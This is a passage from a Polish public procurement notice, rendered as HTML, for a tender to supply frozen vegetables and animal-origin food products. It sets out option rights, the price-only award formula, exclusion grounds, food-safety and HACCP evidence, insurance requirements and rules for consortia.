postanowieniach umowy (załącznik nr 5a i 5b do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331170-9 - Warzywa mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zgodnie z art. 441 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje, a Wykonawca wyraża zgodę na<br/>skorzystanie z prawa opcji. Prawem opcji objęte jest świadczenie sukcesywnych dostaw wyszczególnionych w<br/>poszczególnych pozycjach asortymentowych wskazanych powyżej w tabeli Nr 1/2 w kolumnie 5 (w zależności od<br/>zadania/części zamówienia w zakresie którego ma być realizowane zamówienie) oraz załączniku nr 1 do SWZ – formularzu<br/>ofertowym.<br/>Zamawiający przewiduje możliwość skorzystania z prawa opcji określonego w art. 441 ustawy Pzp (prawo opcji) dla<br/>poszczególnych pozycji asortymentowych maksymalnie do ilości asortymentu ujętego w tabeli nr 1/2 (kolumnach nr 5 „Ilości<br/>stanowiące zamówienie w ramach prawa opcji”) oraz w formularzu ofertowym – załączniku nr 1 do SWZ.<br/>Zamawiający w przypadku skorzystania z prawa opcji nie jest zobowiązany w jej ramach do zamawiania każdego<br/>asortymentu składającego się na przedmiot zamówienia (każdej pozycji asortymentowej ujętej w tabeli nr 1/2). Przedmiot<br/>zamówienia każdorazowo będzie określony bieżącymi potrzebami Zamawiającego, które są w pełni uzależnione od<br/>zmiennej ilości stanów żywionych, planowanych lub nieplanowanych potrzeb oraz przedsięwzięć, uzyskanie dodatkowych<br/>środków finansowych na uruchomienie prawa opcji.<br/>Prawo opcji zostanie uruchomione po wyczerpaniu ilości z zamówienia podstawowego w danej pozycji asortymentowej.<br/>Zamawiający zastrzega, iż część zamówienia określona jako „prawo opcji” jest uprawnieniem, a nie zobowiązaniem<br/>Zamawiającego. Zamawiający może nie skorzystać z prawa opcji w szczególności w przypadku nieuzyskania środków<br/>finansowych na ten cel, a Wykonawcy nie przysługują z tego tytułu żadne roszczenia.<br/>Zamówienie podstawowe w ilościach określonych w tabeli nr 1/2 (kolumna 4) jest zamówieniem gwarantowanym<br/>Wykonawcy.<br/>Zamówienie objęte prawem opcji będzie realizowane na zasadach określonych w projektowanych postanowieniach umowy<br/>(Załącznik Nr 5a/5b), stosując odpowiednio postanowienia jak dla zamówienia podstawowego (gwarantowanego). <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający będzie się kierował następującym<br/>kryteriami i ich znaczeniem (wagą):<br/>X - cena brutto oferty – waga 100%<br/>X = (Cn : Cb) x 100 x 100% ( ilość punktów )<br/>gdzie<br/>X - ilość punktów uzyskanych w kryterium „cena brutto oferty”<br/>Cn– najniższa cena brutto spośród ocenianych ofert<br/>Cb – cena brutto oferty ocenianej<br/>Przez „cenę brutto oferty” zamawiający rozumie wartość ogółem brutto (wartość zamówienia podstawowego+wartość zamówienia w<br/>ramach opcji) - z formularza ofertowego stanowiącego załącznik Nr 1 do<br/>SWZ . Pod pojęciem ceny należy rozumieć cenę w rozumieniu art. 3 ust. 1 pkt 1 i ust. 2 ustawy z dnia 9 maja 2014 r. o informowaniu<br/>o cenach towarów i usług (Dz. U. z 2019 r. poz. 178). Za najkorzystniejszą cenę brutto zamawiający uznaje cenę najniższą.<br/>Maksymalna liczba punktów, jaką Wykonawca może uzyskać w kryterium „cena brutto oferty” wynosi 100 punktów.<br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców w zakresie wskazanego<br/>powyżej kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki na podstawie art. 112 ustawy Pzp<br/>dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek udziału w postępowaniu, jeżeli posiada zatwierdzenie zakładu do produkcji lub obrotu w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia, przez organ urzędowej kontroli żywności<br/>(Powiatowego Lekarza Weterynarii lub Państwowej Powiatowej Inspekcji Sanitarnej) – tzn. posiada:<br/>DLA ZADANIA 1:<br/>• obowiązującą decyzję administracyjną Powiatowego Lekarza Weterynarii w sprawie zatwierdzenia zakładu do produkcji<br/>lub obrotu, określającą rodzaj i zakres prowadzonej działalności związanej z przedmiotem zamówienia zgodnie z art. 20<br/>ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego ( Dz. U. z 2020 r. poz. 1753 z późn. zm.)<br/>lub<br/>• obowiązującą decyzję administracyjną właściwego organu Państwowej Powiatowej Inspekcji Sanitarnej o zatwierdzeniu<br/>zakładu do wprowadzania do obrotu produktów pochodzenia zwierzęcego, nieobjętego urzędową kontrolą organów<br/>Inspekcji Weterynaryjnej, określającą rodzaj i zakres prowadzonej działalności zgodnie z art. 61 i 62 ustawy z dnia 25<br/>sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2022 poz. 2132 z późn. zm.);<br/>DLA ZADANIA 2:<br/>• obowiązującą decyzję administracyjną właściwego organu Państwowej Powiatowej Inspekcji Sanitarnej o zatwierdzeniu<br/>zakładu, określającą rodzaj i zakres prowadzonej działalności związanej z przedmiotem zamówienia zgodnie z art. 61 i 62<br/>ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2022 poz. 2132 z późn. zm.);<br/>DOTYCZY ZADANIA 1 i 2:<br/>W przypadku, gdy ofertę składa Wykonawca z Unii Europejskiej, spoza obszaru Rzeczpospolitej Polskiej, musi posiadać<br/>aktualną decyzję wydaną przez właściwy organ danego kraju o zatwierdzeniu zakładu w zakresie części zamówienia lub<br/>rodzaju żywności (grupy produktów) obejmujących tę część zamówienia wraz z weterynaryjnym numerem identyfikacyjnym<br/>w przypadku dotyczącym żywności (grupy produktów) pochodzenia zwierzęcego.<br/>W przypadku, gdy ofertę składa Wykonawca z krajów trzecich – musi on posiadać aktualną decyzję wydaną przez właściwy<br/>organ w danym kraju o dopuszczeniu zakładu do produkcji i na eksport na rynki innych krajów (w tym krajów Unii<br/>Europejskiej) w zakresie części zamówienia lub rodzaju żywności (grupy produktów) obejmujących tę część zamówienia.<br/>Zamawiający informuje, że podwykonawca, który będzie brał udział w realizacji zamówienia powinien posiadać stosowne<br/>uprawnienia i zezwolenia określone powyżej, jeżeli realizacja powierzonej mu części zamówienia wymaga zgodnie z<br/>przepisami prawa posiadania takich uprawnień.<br/>Wybrany Wykonawca jest zobowiązany posiadać dokumenty wskazane powyżej przez cały okres trwania umowy oraz<br/>okazywać je Zamawiającemu na każde jego wezwanie. <br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego: warunek dotyczący uprawnień<br/>do prowadzenia określonej działalności gospodarczej lub zawodowej, musi być spełniony przez tego z wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia publicznego, który będzie faktycznie realizował przedmiotowe<br/>zamówienie, jeżeli przepisy prawa wymagają posiadania takich uprawnień.<br/>W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z<br/>którego wynika, które dostawy wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 4 do SWZ.<br/>W przypadku polegania przez członków konsorcjum na uprawieniach, doświadczeniu, kwalifikacjach lub wykształceniu<br/>członka takiego konsorcjum łączenie zdolności członków konsorcjum nie może następować w sposób dowolny. Liczy się<br/>rola, jaką członek grupy odegra przy realizacji zamówienia. Wymagane zdolności powinien posiadać co najmniej ten z<br/>konsorcjantów, który w ramach przyjętego wewnętrznie podziału zadań wyznaczony zostanie do realizowania danej części<br/>zamówienia, z którą wiąże się obowiązek posiadania konkretnych uprawnień, doświadczenia, kwalifikacji lub wykształcenia.<br/>W celu potwierdzenia spełnienia tych warunków wykonawca ma obowiązek złożenia wraz z ofertą oświadczenia, z którego<br/>wynika, które dostawy wykonają poszczególni współwykonawcy. Oświadczenie nie stanowi dodatkowego zobowiązania do<br/>realizacji określonej części zamówienia, ponieważ zamawiający i tak może żądać wykonania całości lub określonej części<br/>zamówienia przez dowolnie wskazanego przez siebie wykonawcę ze względu na solidarną odpowiedzialność<br/>współwykonawców za wykonanie umowy w sprawie zamówienia (art. 445 ust. 1 Pzp w zw. z art. 366 § 1 Kc). Celem art. 117<br/>ust. 4 Pzp jest umożliwienie weryfikacji, czy planowany podział zadań pomiędzy członków konsorcjum zapewnia realne<br/>wykorzystanie deklarowanych przez nich zasobów.<br/>3) Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.<br/>4) Zdolności technicznej lub zawodowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału<br/>w postępowaniu Zamawiający żąda następujących dokumentów:<br/>2.2.1. oświadczenia Wykonawcy o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007<br/>r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę/ ofertę<br/>częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty/oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy<br/>kapitałowej, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 108 ust. 1 pkt 5 ustawy Pzp<br/>2.2.2. Odpisu lub Informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt. 4) ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/>2.2.3. oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w:<br/>- art. 108 ust. 1 pkt 3 ustawy,<br/>- art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>- art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji;<br/>- art. 108 ust. 1 pkt 6 ustawy,<br/>- art. 109 ust. 1 pkt 2) ustawy;<br/>- art. 109 ust. 1 pkt 3) ustawy;<br/>- art. 109 ust. 1 pkt 4) ustawy;<br/>- art. 7 ust. 1 ustawy z dnia 13 kwietnia o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego (poz. 835 z późn. zm.)<br/>3. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) – dokumenty<br/>wymienione w pkt. 2.2. ppkt. 2.2.1., 2.2.2., 2.2.3., składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(partner konsorcjum/wspólnik spółki cywilnej).<br/>4. W przypadku innego podmiotu, na zdolnościach którego wykonawca polega, dokumenty wymienione w pkt. 2.2. ppkt. 2.2.1.,<br/>2.2.2., 2.2.3., Wykonawca składa w odniesieniu do każdego z podmiotów.<br/>5. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt.<br/>2.2. ppkt. 2.2.2., lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w art. 108 ust. 1 pkt 1), 2) i 4)<br/>ustawy Pzp zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy,<br/>ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć,<br/>złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o<br/>oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu<br/>zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.<br/>6. Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, przedstawienia podmiotowych<br/>środków dowodowych.<br/>7. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych jeżeli może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r o informatyzacji<br/>działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych - Dotyczy ZADANIA 1 i 2:<br/>2.1. W celu wykazania spełnienia przez Wykonawcę warunku udziału w postępowaniu określonego w art. 112 ust. 2 pkt. 2) ustawy<br/>Pzp dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów; Zamawiający zażąda przedstawienia:<br/>Wykonawca spełni warunek udziału w postępowaniu, jeżeli posiada zatwierdzenie zakładu do produkcji lub obrotu w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia, przez organ urzędowej kontroli żywności (Powiatowego Lekarza<br/>Weterynarii lub Państwowej Powiatowej Inspekcji Sanitarnej) – tzn. posiada:<br/>􀀀 DLA ZADANIA 1:<br/>• obowiązującą decyzję administracyjną Powiatowego Lekarza Weterynarii w sprawie zatwierdzenia zakładu do produkcji lub obrotu,<br/>określającą rodzaj i zakres prowadzonej działalności związanej z przedmiotem zamówienia zgodnie z art. 20 ustawy z dnia 16<br/>grudnia 2005 r. o produktach pochodzenia zwierzęcego ( Dz. U. z 2020 r. poz. 1753 z późn. zm.)<br/>lub<br/>• obowiązującą decyzję administracyjną właściwego organu Państwowej Powiatowej Inspekcji Sanitarnej o zatwierdzeniu zakładu do<br/>wprowadzania do obrotu produktów pochodzenia zwierzęcego, nieobjętego urzędową kontrolą organów Inspekcji Weterynaryjnej,<br/>określającą rodzaj i zakres prowadzonej działalności zgodnie z art. 61 i 62 ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie<br/>żywności i żywienia (Dz. U. z 2022 poz. 2132 z późn. zm.);<br/>􀀀 DLA ZADANIA 2:<br/>• obowiązującą decyzję administracyjną właściwego organu Państwowej Powiatowej Inspekcji Sanitarnej o zatwierdzeniu zakładu,<br/>określającą rodzaj i zakres prowadzonej działalności związanej z przedmiotem zamówienia zgodnie z art. 61 i 62 ustawy z dnia 25<br/>sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2022 poz. 2132 z późn. zm.);<br/>DOTYCZY ZADANIA 1 i 2:<br/>W przypadku, gdy ofertę składa Wykonawca z Unii Europejskiej, spoza obszaru Rzeczpospolitej Polskiej, musi posiadać aktualną<br/>decyzję wydaną przez właściwy organ danego kraju o zatwierdzeniu zakładu w zakresie części zamówienia lub rodzaju żywności<br/>(grupy produktów) obejmujących tę część zamówienia wraz z weterynaryjnym numerem identyfikacyjnym w przypadku dotyczącym<br/>żywności (grupy produktów) pochodzenia zwierzęcego.<br/>W przypadku, gdy ofertę składa Wykonawca z krajów trzecich – musi on posiadać aktualną decyzję wydaną przez właściwy organ w<br/>danym kraju o dopuszczeniu zakładu do produkcji i na eksport na rynki innych krajów (w tym krajów Unii Europejskiej) w zakresie<br/>części zamówienia lub rodzaju żywności (grupy produktów) obejmujących tę część zamówienia.<br/>Zamawiający informuje, że podwykonawca, który będzie brał udział w realizacji zamówienia powinien posiadać stosowne<br/>uprawnienia i zezwolenia określone powyżej, jeżeli realizacja powierzonej mu części zamówienia wymaga zgodnie z przepisami<br/>prawa posiadania takich uprawnień.<br/>Wybrany Wykonawca jest zobowiązany posiadać dokumenty wskazane powyżej przez cały okres trwania umowy oraz okazywać je<br/>Zamawiającemu na każde jego wezwanie.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego: warunek dotyczący uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej, musi być spełniony przez tego z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia publicznego, który będzie faktycznie realizował przedmiotowe zamówienie, jeżeli przepisy<br/>prawa wymagają posiadania takich uprawnień.<br/>W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego<br/>wynika, które dostawy wykonają poszczególni Wykonawcy. Wzór oświadczenia stanowi załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dotyczy ZADANIA 1 i 2:<br/>Przedmiotowe środki dowodowe określone w Rozdziale 9 SWZ potwierdzające, że:<br/>* Wykonawca posiada wdrożony i stosuje system HACCP (dokumenty składają wszyscy Wykonawcy). W celu<br/>potwierdzenia, że oferowane dostawy spełniają określone przez Zamawiającego wymagania oraz cechy, Zamawiający<br/>wymaga złożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/>Wykonawca wykaże, że posiada obowiązujący dokument potwierdzający wdrożenie systemu HACCP:<br/>- certyfikat HACCP wystawiony przez niezależną, akredytowaną jednostkę certyfikującą<br/>lub<br/>- zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej lub właściwego Powiatowego Lekarza Weterynarii o<br/>sprawowaniu nadzoru nad wdrożeniem systemu HACCP, wydane na podstawie ustawy z dnia 25 sierpnia 2006r. o<br/>bezpieczeństwie żywności i żywienia. Przedłożone na tej podstawie zaświadczenie winno potwierdzać, że wykonawca wdrożył zasady systemu HACCP.<br/>lub<br/>- protokół z kontroli sanitarnej przeprowadzonej przez organy Państwowej Inspekcji Sanitarnej jako organu urzędowej<br/>kontroli żywności, w skład którego wchodzi punkt zawierający pozytywną ocenę opracowania, wdrożenia i utrzymania<br/>systemu HACCP na podstawie ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia<br/>lub<br/>- Wykonawca może zamiast dokumentów, o których mowa złożyć inne dokumenty potwierdzające odpowiednio stosowanie<br/>przez Wykonawcę równoważnych środków zapewnienia jakości i stosownie równoważnych środków zarządzania.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełnią ten warunek jeżeli dokument ten złożą ci uczestnicy,<br/>którzy będą faktycznie wykonywali dostawy będące przedmiotem niniejszego postępowania. Dokumenty sporządzone w<br/>języku obcym są składane wraz z tłumaczeniem na język polski. Jeżeli Wykonawca nie złoży przedmiotowych środków<br/>dowodowych lub złożone środki dowodowe są niekompletne, Zamawiający wezwie Wykonawcę do ich złożenia lub<br/>uzupełnienia w wyznaczonym terminie.<br/>* oferowane przez Wykonawcę produkty równoważne spełniają wymagania określone przez Zamawiającego (jeżeli dotyczy<br/>– jeżeli Wykonawca oferuje produkty równoważne – szczegóły w Rozdziale 9 SWZ).<br/>Jeżeli Wykonawca złoży oświadczenie, że oferuje produkty o rozwiązaniach równoważnych, a nie złoży przedmiotowych<br/>środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wezwie Wykonawcę do<br/>ich złożenia lub uzupełnienia w wyznaczonym terminie. Zamawiający akceptuje równoważne środki dowodowe, jeśli<br/>potwierdzają, że oferowane świadczenia spełniają określone przez Zamawiającego wymagania użytkowe, jakościowe i w<br/>zakresie właściwości fizyko-chemicznych.<br/>Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest zobowiązany wykazać,<br/>że oferowane przez niego dostawy przedmiotu zamówienia spełniają wymagania określone przez zamawiającego w<br/>załączniku nr 1a/1b do SWZ („Minimalne wymagania jakościowe” zawierające szczegółowy opisy przedmiotu zamówienia<br/>dla poszczególnych pozycji asortymentowych), przedkładając wraz z ofertą:<br/>- wykaz produktów z zastosowanymi rozwiązaniami równoważnymi;<br/>- opis każdego produktu równoważnego np.: szczegółowa karta produktu, deklaracja zgodności, protokół z badań<br/>laboratoryjnych, potwierdzający zgodność właściwości fizyko-chemicznych, jakościowych danego produktu w stosunku do<br/>opisanych przez zamawiającego.<br/>Opis każdego produktu równoważnego załącza wraz z ofertą tylko ten Wykonawca, który oferuje produkty równoważne. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Na podstawie art. 107 ust. 2 ustawy Pzp – jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych wraz z ofertą<br/>lub złożone przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w<br/>wyznaczonym terminie.<br/>Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>Wykonawcy zobowiązani są załączyć do oferty następujące dokumenty:<br/>1. Oświadczenie o spełnieniu warunków udziału w postępowaniu –zał. nr 2b do SWZ<br/>2. Oświadczenie o niepodleganiu wykluczeniu Zał. nr 2a do SWZ<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców:<br/>a) oświadczenia, o których mowa w pkt 1 i 2 składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu,<br/>b) oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp – składają tylko Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia. Z oświadczenia musi wynikać, które dostawy<br/>wykonają poszczególni Wykonawcy – zał. nr 4 do SWZ<br/>4. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z oświadczeniem własnym, o którym mowa w pkt 1 i 2, także:<br/>a) oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu (zał. nr 2c do<br/>SWZ) oraz<br/>b) oświadczenie podmiotu udostępniającego zasoby potwierdzające spełnianie warunków udziału w postępowaniu, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby (zał. Nr 2d do SWZ) oraz<br/>c) zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych zasobów na<br/>potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów na zasadach określonych w art. 118 ustawy Pzp.<br/>5. Oświadczenia o spełnianiu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia z postępowania, o<br/>których mowa w pkt 1-4 muszą być aktualne na dzień składania ofert.<br/>6. Pełnomocnictwo, w przypadku podpisania dokumentów przez osoby(ę) niewymienioną w dokumencie rejestracyjnym<br/>Wykonawcy. Pełnomocnictwo dla podmiotów występujących wspólnie musi być wystawione przez wszystkich wykonawców<br/>ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać<br/>przedmiotowe pełnomocnictwo.<br/>7. przedmiotowe środki dowodowe określone w Rozdziale 9 SWZ;<br/>8. Uzasadnienie zastrzeżenia informacji stanowiącej tajemnicę przedsiębiorstwa, o ile dotyczy<br/>9. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający<br/>żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego<br/>rejestru.<br/>10. Przed podpisaniem umowy - potwierdzenie wniesienia zabezpieczenia należytego wykonania umowy, umowa spółki,<br/>cywilnej, umowa konsorcjum - jeżeli dotyczy<br/>11. Wybrany Wykonawca, z którym Zamawiający podpisze umowę w sprawie zamówienia publicznego musi okazać się<br/>posiadaniem w całym okresie realizacji umowy ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności gospodarczej związanej z przedmiotem zamówienia obejmującego:<br/>- odpowiedzialność ubezpieczonego za szkody osobowe, rzeczowe wyrządzone przez wyprodukowane, dostarczone lub<br/>sprzedane towary (środki spożywcze)<br/>- odpowiedzialność za szkody wyrządzone poprzez niewykonanie lub nienależyte wykonanie umowy.<br/>Ubezpieczenie OC musi opiewać na sumę gwarancyjną nie mniejszą niż 100 000,00 zł dla ZADANIA 1 oraz 50 000,00 zł dla<br/>ZADANIA wraz z dowodem potwierdzającym, opłacenie składek w/w wartości.<br/>Szczegółowy wykaz wymaganych dokumentów został opisany w Rozdziale 10 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, np. łącząc się w konsorcja lub spółki cywilne lub inną formę prawną.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z Wykonawców nie może<br/>podlegać wykluczeniu w okolicznościach, o których mowa w Rozdziale 6 SWZ.<br/>3. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W takim przypadku Wykonawca<br/>musi złożyć wraz z ofertą stosowne pełnomocnictwo uprawniające do wykonywania określonych czynności w postępowaniu<br/>o udzieleniu zamówienia publicznego na zasadach określonych w SWZ.<br/>4. Dokumenty składane przez członków konsorcjum czy wspólników spółki cywilnej, w tym oświadczenia muszą być<br/>podpisane przez wyznaczonego pełnomocnika lub osobę upoważnioną do reprezentowania danego podmiotu.<br/>5. W toku postępowania wszelka korespondencja ze strony Zamawiającego będzie kierowana do pełnomocnika danego<br/>podmiotu ubiegającego się wspólnie o zamówienie.<br/>6. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu na podstawie<br/>art. 108 ust. 1 oraz art. 109 ust. 